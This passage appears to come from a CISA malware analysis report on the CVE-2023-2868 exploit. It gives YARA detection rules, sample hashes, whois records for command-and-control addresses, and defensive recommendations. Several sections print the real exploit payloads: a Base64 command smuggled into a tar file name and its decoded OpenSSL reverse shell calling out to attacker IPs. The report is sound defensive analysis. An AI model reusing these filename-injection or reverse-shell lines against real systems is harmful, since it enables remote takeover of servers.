         SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
  
         SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
  
         SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
  
         SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
  
         SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
  
     strings:
  
         $s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
  
         $s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
  
         $s3 = { 54 44 4e 53 64 47 4e 44 4f }
  
         $s4 = { 5a 45 63 78 64 }
  
         $s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
  
         $s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
  
         $s7 = { 4c 6e 52 34 64 41 }
  
     condition:
  
         5 of them
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This artifact contains the same payloads as “b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321.”

949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788

Tags

backdoortrojan

Details

-->

Antivirus

No matches found.

YARA Rules

• rule CISA_10452108_03 : backdoor communicates_with_c2 installs_other_components
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10452108"
  
         Date = "2023-06-20"
  
         Last_Modified = ""
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "communicates-with-c2 installs-other-components"
  
         Malware_Type = "backdoor"
  
         Tool_Type = "unknown"
  
         Description = "Detects malicious Linux reverse shell samples"
  
         SHA256_1 = "2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b"
  
     strings:
  
         $s0 = { 6f 47 68 37 6f 68 63 34 }
  
         $s1 = { 41 6b 65 6f 38 61 68 58 }
  
         $s2 = { 65 65 71 75 65 69 37 41 30 39 33 30 32 }
  
     condition:
  
         all of them
  
  }


• rule CISA_10454006_09 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868"
  
         SHA256_1 = "949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788"
  
         SHA256_2 = "f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0"
  
         SHA256_3 = "2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b"
  
     strings:
  
         $s1 = { 61 62 63 64 65 66 67 }
  
         $s2 = { 63 32 56 30 63 32 6c 6b 49 48 4e 6f 49 43 31 6a }
  
         $s3 = { 49 44 49 2b 4c 32 52 6c 64 69 39 75 64 57 78 73 }
  
         $s4 = { 49 43 39 30 62 58 41 76 }
  
         $s5 = { 59 32 39 75 62 6d 56 6a 64 }
  
         $n1 = { 6f 47 68 37 6f 68 63 34 }
  
         $n2 = { 41 6b 65 6f 38 61 68 58 }
  
         $n3 = { 65 65 71 75 65 69 37 41 30 39 33 30 32 }
  
     condition:
  
         all of ($s*) or all of ($n*)
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This artifact is a .tar sample that contains five files compressed. Four of the files within this .tar sample do not contain malicious capabilities. One of the files contains a malicious payload inside its filename that exploits CVE-2023-2868. Upon decompressing the archive the payload is seen below.

--Begin Payload--

'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvcCI=;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'

--End Payload--

f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0

Tags

backdoortrojan

Details

-->

Antivirus

No matches found.

YARA Rules

• rule CISA_10452108_03 : backdoor communicates_with_c2 installs_other_components
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10452108"
  
         Date = "2023-06-20"
  
         Last_Modified = ""
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "communicates-with-c2 installs-other-components"
  
         Malware_Type = "backdoor"
  
         Tool_Type = "unknown"
  
         Description = "Detects malicious Linux reverse shell samples"
  
         SHA256_1 = "2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b"
  
     strings:
  
         $s0 = { 6f 47 68 37 6f 68 63 34 }
  
         $s1 = { 41 6b 65 6f 38 61 68 58 }
  
         $s2 = { 65 65 71 75 65 69 37 41 30 39 33 30 32 }
  
     condition:
  
         all of them
  
  }


• rule CISA_10454006_09 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868"
  
         SHA256_1 = "949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788"
  
         SHA256_2 = "f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0"
  
         SHA256_3 = "2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b"
  
     strings:
  
         $s1 = { 61 62 63 64 65 66 67 }
  
         $s2 = { 63 32 56 30 63 32 6c 6b 49 48 4e 6f 49 43 31 6a }
  
         $s3 = { 49 44 49 2b 4c 32 52 6c 64 69 39 75 64 57 78 73 }
  
         $s4 = { 49 43 39 30 62 58 41 76 }
  
         $s5 = { 59 32 39 75 62 6d 56 6a 64 }
  
         $n1 = { 6f 47 68 37 6f 68 63 34 }
  
         $n2 = { 41 6b 65 6f 38 61 68 58 }
  
         $n3 = { 65 65 71 75 65 69 37 41 30 39 33 30 32 }
  
     condition:
  
         all of ($s*) or all of ($n*)
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This artifact is a .tar sample that contains five files compressed. Four of the files within this .tar sample do not contain malicious capabilities. One of the files contains a malicious payload inside its filename that exploits CVE-2023-2868. Upon decompressing the archive the payload is seen below.

--Begin Payload--

'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6NDQzID4vdG1wL3AgMj4vZGV2L251bGw7cm0gL3RtcC9wIg==;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'

--End Payload--

2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b

Tags

backdoortrojan

Details

-->

Antivirus

YARA Rules

• rule CISA_10452108_03 : backdoor communicates_with_c2 installs_other_components
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10452108"
  
         Date = "2023-06-20"
  
         Last_Modified = ""
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "communicates-with-c2 installs-other-components"
  
         Malware_Type = "backdoor"
  
         Tool_Type = "unknown"
  
         Description = "Detects malicious Linux reverse shell samples"
  
         SHA256_1 = "2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b"
  
     strings:
  
         $s0 = { 6f 47 68 37 6f 68 63 34 }
  
         $s1 = { 41 6b 65 6f 38 61 68 58 }
  
         $s2 = { 65 65 71 75 65 69 37 41 30 39 33 30 32 }
  
     condition:
  
         all of them
  
  }


• rule CISA_10454006_09 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868"
  
         SHA256_1 = "949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788"
  
         SHA256_2 = "f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0"
  
         SHA256_3 = "2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b"
  
     strings:
  
         $s1 = { 61 62 63 64 65 66 67 }
  
         $s2 = { 63 32 56 30 63 32 6c 6b 49 48 4e 6f 49 43 31 6a }
  
         $s3 = { 49 44 49 2b 4c 32 52 6c 64 69 39 75 64 57 78 73 }
  
         $s4 = { 49 43 39 30 62 58 41 76 }
  
         $s5 = { 59 32 39 75 62 6d 56 6a 64 }
  
         $n1 = { 6f 47 68 37 6f 68 63 34 }
  
         $n2 = { 41 6b 65 6f 38 61 68 58 }
  
         $n3 = { 65 65 71 75 65 69 37 41 30 39 33 30 32 }
  
     condition:
  
         all of ($s*) or all of ($n*)
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This artifact is dropped by two different .tar files and contains a payload inside its filename that exploits CVE-2023-2868. The exploit payload is a shell script code with an embedded Base64 encoded reverse shell. Upon execution the malware Base64 decodes and executes the reverse shell code. The reverse shells establish connections using the "OpenSSL" to the C2 IP address "107[.]148[.]223[.]196" and ports “8080” or "443." The standard input and output are redirected to the named pipe "/tmp/p" and then removes "tmp/p" after the connection is closed.

The contents within the two dropped files are the same and is a string "oGh7ohc4Akeo8ahXeequei7A09302." This accounts for the two samples having the same hash, however, payload contents are different within the names of these files. When the payload executes, the commands slightly differ in the use of the port number as seen below.

When the "snapshot.tar" file is decompressed the below payload is revealed.

--Begin Payload--

'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvcCI=;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'

--End Payload--

--Begin Decoded Payload--

setsid sh -c "mkfifo /tmp/p;sh -i &1|openssl s_client -quiet -connect 107[.]148[.]223[.]196:8080 >/tmp/p 2>/dev/null;rm /tmp/p"

--End Decoded Payload--

When the "snapshot0.tar" file is decompressed the below payload is revealed.

--Begin Payload--

'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6NDQzID4vdG1wL3AgMj4vZGV2L251bGw7cm0gL3RtcC9wIg==;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'

--End Payload--

--Begin Decoded Payload--

setsid sh -c "mkfifo /tmp/p;sh -i &1|openssl s_client -quiet -connect 107[.]148[.]223[.]196:443 >/tmp/p 2>/dev/null;rm /tmp/p"

--End Decoded Payload--

107[.]148[.]223[.]196

Tags

command-and-control

Ports

• 443 TCP


• 8080 TCP

Whois

NetRange:     107.148.0.0 - 107.149.255.255

CIDR:         107.148.0.0/15

NetName:        PT-82-10

NetHandle:     NET-107-148-0-0-1

Parent:         NET107 (NET-107-0-0-0-0)

NetType:        Direct Allocation

OriginAS:     AS398478, AS398993, AS399195, AS54600, AS398823

Organization: PEG TECH INC (PT-82)

RegDate:        2013-11-08

Updated:        2021-01-06

Ref:            https://rdap.arin.net/registry/ip/107.148.0.0

OrgName:        PEG TECH INC

OrgId:         PT-82

Address:        55 South Market Street, Suite 320

City:         San Jose

StateProv:     CA

PostalCode:     95113

Country:        US

RegDate:        2012-03-27

Updated:        2017-01-28

Ref:            https://rdap.arin.net/registry/entity/PT-82

OrgNOCHandle: NOC12550-ARIN

OrgNOCName: NOC

OrgNOCPhone: +1-657-206-5036

OrgNOCEmail:

OrgNOCRef:    https://rdap.arin.net/registry/entity/NOC12550-ARIN

OrgAbuseHandle: ABUSE3497-ARIN

OrgAbuseName: Abuse

OrgAbusePhone: +1-657-206-5036

OrgAbuseEmail:

OrgAbuseRef:    https://rdap.arin.net/registry/entity/ABUSE3497-ARIN

OrgTechHandle: NOC12550-ARIN

OrgTechName: NOC

OrgTechPhone: +1-657-206-5036

OrgTechEmail:

OrgTechRef:    https://rdap.arin.net/registry/entity/NOC12550-ARIN

Relationships

Description

This IP address is used as C2 by the samples exploiting CVE-2023-2868.

2b2b7c5e825b7a18e13319b4a1275a0dd0086abd58b2d45939269d5a613a41e7

Tags

backdoortrojan

Details

-->

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This artifact contains a payload that exploits CVE-2023-2868. The exploit payload is a shell script code with an embedded Base64 encoded reverse shell. Upon execution the malware base64 decodes and executes the reverse shell code. The reverse shell establishes connections using the "OpenSSL" to the C2 IP address "107[.]148[.]219[.]54" and port “443” and redirects the standard input and output to the named pipe "/tmp/p" and then removes "/tmp/p" after the connection is closed.

--Begin Encoded Payload--

'`abcdefg\=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIxOS41NDo0NDMgPi90bXAvcCAyPi9kZXYvbnVsbDtybSAvdG1wL3Ai;ee\=ba;G\=s;"ech"o $abcdefg;${ee}se64 -d;${G}h;wh66489.txt`'

--End Encoded Payload--

--Begin Decoded Payload--

setsid sh -c "mkfifo /tmp/p;sh -i &1|openssl s_client -quiet -connect 107[.]148[.]219[.]54:443 >/tmp/p 2>/dev/null;rm /tmp/p"

--End Decoded Payload--

107[.]148[.]219[.]54

Tags

command-and-control

Ports

• 443 TCP

Whois

NetRange:     107.148.0.0 - 107.149.255.255

CIDR:         107.148.0.0/15

NetName:        PT-82-10

NetHandle:     NET-107-148-0-0-1

Parent:         NET107 (NET-107-0-0-0-0)

NetType:        Direct Allocation

OriginAS:     AS398478, AS398993, AS399195, AS54600, AS398823

Organization: PEG TECH INC (PT-82)

RegDate:        2013-11-08

Updated:        2021-01-06

Ref:            https://rdap.arin.net/registry/ip/107.148.0.0

OrgName:        PEG TECH INC

OrgId:         PT-82

Address:        55 South Market Street, Suite 320

City:         San Jose

StateProv:     CA

PostalCode:     95113

Country:        US

RegDate:        2012-03-27

Updated:        2017-01-28

Ref:            https://rdap.arin.net/registry/entity/PT-82

OrgAbuseHandle: ABUSE3497-ARIN

OrgAbuseName: Abuse

OrgAbusePhone: +1-657-206-5036

OrgAbuseEmail:

OrgAbuseRef:    https://rdap.arin.net/registry/entity/ABUSE3497-ARIN

OrgTechHandle: NOC12550-ARIN

OrgTechName: NOC

OrgTechPhone: +1-657-206-5036

OrgTechEmail:

OrgTechRef:    https://rdap.arin.net/registry/entity/NOC12550-ARIN

OrgNOCHandle: NOC12550-ARIN

OrgNOCName: NOC

OrgNOCPhone: +1-657-206-5036

OrgNOCEmail:

OrgNOCRef:    https://rdap.arin.net/registry/entity/NOC12550-ARIN

Relationships

Description

This IP address is used as C2 by the samples exploiting CVE-2023-2868.

Relationship Summary

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

• Maintain up-to-date antivirus signatures and engines.


• Keep operating system patches up-to-date.


• Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.


• Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.


• Enforce a strong password policy and implement regular password changes.


• Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.


• Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.


• Disable unnecessary services on agency workstations and servers.


• Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).


• Monitor users' web browsing habits; restrict access to sites with unfavorable content.


• Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).


• Scan all software downloaded from the Internet prior to executing.


• Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

• 1-888-282-0870


• CISA Service Desk (UNCLASS)


• CISA SIPR (SIPRNET)


• CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

• Web: https://malware.us-cert.gov


• E-Mail: [email protected]


• FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Acknowledgments

Mandiant contributed to this report.